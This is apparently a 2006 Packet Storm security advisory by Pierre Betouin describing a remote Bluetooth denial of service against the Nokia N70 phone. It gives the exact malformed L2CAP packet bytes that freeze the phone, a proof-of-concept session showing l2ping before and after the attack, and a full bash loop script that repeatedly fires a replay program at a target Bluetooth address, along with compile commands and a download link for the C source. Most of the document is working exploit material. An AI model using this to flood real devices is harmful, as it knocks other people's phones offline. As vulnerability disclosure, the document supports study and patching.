155022006-nokia_n70.txt

2006-02-25T00:00:00
ID PACKETSTORM:44125
Type packetstorm
Reporter Pierre BETOUIN
Modified 2006-02-25T00:00:00

Description

                                        
                                            `[Software affected] Bluetooth Stack on Nokia cell phones  
  
[Version] Nokia N70 and maybe other models  
  
[Impact] Remote Denial of Service, cellular phones begin to be slower and then freeze after a short period (within 30 seconds).  
  
[Credits] Pierre Betouin - pierre.betouin@infratech.fr - Bug found with BSS new release v0.8 GPL fuzzer (Bluetooh Stack Smasher - Linux)   
  
BSS could be downloaded on http://www.secuobs.com/news/15022006-bss_0_8.shtml  
  
[Vendor] notified now  
  
[Original advisory]  
  
http://www.secuobs.com/news/15022006-nokia_n70.shtml#english  
http://www.secuobs.com/news/15022006-nokia_n70.shtml#french  
  
[Concept]  
  
L2CAP packets responsible of the crash are :  
  
7D AF 00 00 41 41 41  
  
Where:  
  
Code field 0x7D (1 byte)  
Ident field 0xAF (1 byte)  
Length field 0x0000 (2 bytes)  
  
0x41 bytes are random padding.  
  
  
[Proof of Concept]  
  
# l2ping -c 3 00:15:A0:XX:XX:XX  
  
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...  
  
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms  
  
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms  
  
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms  
  
3 sent, 3 received, 0% loss  
  
# ./loop.sh 00:15:A0:XX:XX:XX  
  
(.. snip ..)  
  
# l2ping -c 1 00:15:A0:XX:XX:XX  
  
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...  
  
no response from 00:15:A0:XX:XX:XX id 0  
  
1 sent, 0 received, 100% loss   
  
  
[replay_l2cap_packet_nokiaN70.c] could be downloaded on http://www.secuobs.com/replay_l2cap_packet_nokiaN70.c  
  
[Loop.sh] as follows :   
  
#!/bin/bash  
  
# Another Nokia N70 Bluetooth remote Denial of Service  
  
# Pierre BETOUIN pierre.betouin@infratech.fr  
  
# Feb 14 11:21:58 GMT+1 2006  
  
echo "Another Nokia N70 Bluetooth remote Denial of Service"  
  
echo "Pierre BETOUIN pierre.betouin@infratech.fr"  
  
echo ""  
  
if (( $# < 1 )); then  
  
echo "Usage: $0 (uses replay_l2cap_packet_nokiaN70)"  
  
exit  
  
fi  
  
if [ -x ./replay_l2cap_packet_nokiaN70 ]; then  
  
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."  
  
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"  
  
echo ""  
  
read  
  
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)  
  
./replay_l2cap_packet_nokiaN70 $1  
  
done  
  
else  
  
echo "You must compile replay_l2cap_packet_nokiaN70 before"  
  
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"  
  
exit  
  
fi  
  
`